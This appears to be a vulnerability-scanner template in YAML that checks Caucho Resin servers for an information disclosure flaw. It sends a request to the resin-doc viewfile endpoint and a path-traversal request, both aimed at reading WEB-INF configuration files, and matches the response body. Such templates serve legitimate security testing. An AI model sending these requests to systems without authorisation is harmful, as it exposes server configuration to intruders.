id: caucho-resin-info-disclosure
info:
name: Caucho Resin Information Disclosure
author: pikpikcu
severity: info
reference:
- https://www.exploit-db.com/exploits/27888
tags: exposure,resin,caucho
requests:
- method: GET
path:
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
matchers-condition: and
matchers:
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and
- type: status
status:
- 200